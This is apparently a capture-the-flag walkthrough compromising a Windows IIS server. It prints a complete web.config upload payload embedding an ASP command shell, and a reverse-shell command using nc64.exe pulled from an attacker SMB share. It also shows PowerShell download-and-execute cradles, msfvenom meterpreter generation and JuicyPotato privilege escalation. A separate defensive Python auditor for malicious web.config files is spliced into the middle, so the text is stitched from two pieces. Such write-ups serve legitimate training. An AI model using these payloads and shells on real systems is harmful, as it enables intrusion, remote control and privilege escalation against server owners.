Port scan
80/tcp open http
The site itself only serves an image of a wizard, merlin.jpg.
Looking at the response headers in F12 shows the site is powered by ASP.NET:
Directory brute-forcing:
gobuster -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx
/transfer.aspx (Status: 200)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
/transfer.aspx
presents a simple form with "Browse..." and "Upload" buttons:
Try uploading an image first.
Then I grabbed a copy of an aspx shell and tried to upload it. On the first attempt the page rejected it.
Tried a %00 null-byte bypass.
The upload succeeded, but when I browsed to http://10.10.10.93/UploadedFiles/cmdasp.aspx it returned an error:
so the file is uploaded but cannot be executed.
The error hints at modifying web.config. The web.config file holds the settings and configuration data for a web application on an IIS server, similar to .htaccess on an Apache server. If I can modify it through the upload, maybe it can be exploited.
Alternatively, capture the request in Burp and fuzz the extension with the raft-small-extensions.txt wordlist from [SecLists] to see which file extensions are accepted; .config turns out to be accepted.
Googling "bypass upload aspx" turns up:
Bypass Upload Restrictions and Evade Detection | Fgsec
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="new_policy" path="*.config" verb="GET" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings></appSettings>
</configuration>
<!--
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)
%>
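A defender-side check for this class of upload, as an added example (not code from this writeup, the Fgsec post or IIS): it parses a candidate web.config and flags the three things the payload above relies on (a handler routing *.config through asp.dll, the requestFiltering removals, and an embedded <% %> script block), and treats a not-well-formed file as a finding too. The sample configs are constructed to mirror that payload.

```python
"""Audit an uploaded web.config for the tricks in the payload above. Added example,
not code from the original writeup or from IIS; sample configs are constructed."""
import re
import xml.etree.ElementTree as ET

# Constructed sample 1: the payload's XML, then ASP hidden inside an XML comment.
MALICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="new_policy" path="*.config" verb="GET" modules="IsapiModule"
     scriptProcessor="%windir%\system32\inetsrv\asp.dll"
     resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security><requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering></security>
</system.webServer><appSettings></appSettings></configuration>
<!--
<% Response.Write("x") %>
-->"""
# Constructed sample 2: an ordinary config that only sets one app setting.
BENIGN = '<configuration><appSettings><add key="Greeting" value="hi" /></appSettings></configuration>'
# Constructed sample 3: the payload with its closing --> dropped (not well-formed XML).
UNCLOSED = MALICIOUS.replace("\n-->", "")


def audit_web_config(text: str) -> list:
    """Return findings for a candidate web.config; an empty list means nothing suspicious."""
    findings = []
    if re.search(r"<%.*?%>", text, re.S):  # script delimiters never belong in a config
        findings.append("embedded server-side script block (<% ... %>)")
    try:
        root = ET.fromstring(text)
    except ET.ParseError as err:  # IIS rejects such a file with a config error; still flag it
        findings.append(f"not well-formed XML: {err}")
        return findings
    for add in root.iter("add"):
        path, proc = add.get("path", ""), add.get("scriptProcessor", "")
        # Routing *.config (or anything else) through asp.dll turns configuration into code.
        if path.endswith(".config") or proc.lower().endswith("asp.dll"):
            findings.append(f"handler {add.get('name')!r} maps {path!r} to {proc!r}")
    for rm in root.iter("remove"):
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("requestFiltering: .config removed from blocked fileExtensions")
        if rm.get("segment", "").lower() == "web.config":
            findings.append("requestFiltering: web.config removed from hiddenSegments")
    return findings
```

Running audit_web_config over MALICIOUS yields four findings, BENIGN yields none, and UNCLOSED reports the script block and then the XML parse failure.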
http://10.129.154.126/uploadedfiles/web.config?cmd=whoami
sudo python /usr/share/doc/python3-impacket/examples/smbserver.py share .
http://10.129.154.126/uploadedfiles/web.config?cmd=\\10.10.14.72\share\nc64.exe -e cmd.exe 10.10.14.72 443
Got a reverse shell.
Tried several privilege-escalation approaches.
systeminfo
Whoami /priv
SeImpersonatePrivilege is present, which can be abused with GitHub - decoder-it/lonelypotato: Switch to JuicyPotato! https://github.com/decoder-it/juicy-potato
sherlock
GitHub - rasta-mouse/Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities
iex(new-object net.webclient).downloadstring('http://10.10.14.5/Sherlock.ps1')
Find-AllVulns
Watson
How to compile it is covered above.
(new-object net.webclient).downloadfile('http://10.10.14.5/Watson.exe', '\users\merlin\appdata\local\temp\watson.exe')
.\watson.exe
Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=445 -f psh -o www/met-445.ps1
-f psh outputs a PowerShell command that launches a reverse TCP meterpreter shell.
msf exploit(multi/handler) > options
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 445 yes The listen port
run
use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > run
Privilege escalation
potato
Grab a copy of JuicyPotato.exe from the GitHub repository here, making sure to get the 64-bit version of the executable.
Start an HTTP server on Kali.
(new-object net.webclient).downloadfile('http://10.10.14.8:8080/JuicyPotato.exe', '\temp\JuicyPotato.exe')
It needs a COM server port number and a valid CLSID.
This PowerShell script extracts the CLSIDs of the current system:
https://raw.githubusercontent.com/ohpe/juicy-potato/master/CLSID/GetCLSID.ps1
Use a batch script to download the Nishang PowerShell script:
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
Upload it to the target:
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.8:8080/shell.bat', '\temp\shell.bat')
If the default CLSID fails, the exploit author has provided a list of alternative CLSIDs for testing, available here.
Start a listener on Kali.
Use the first one:
./JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
Got a reverse shell.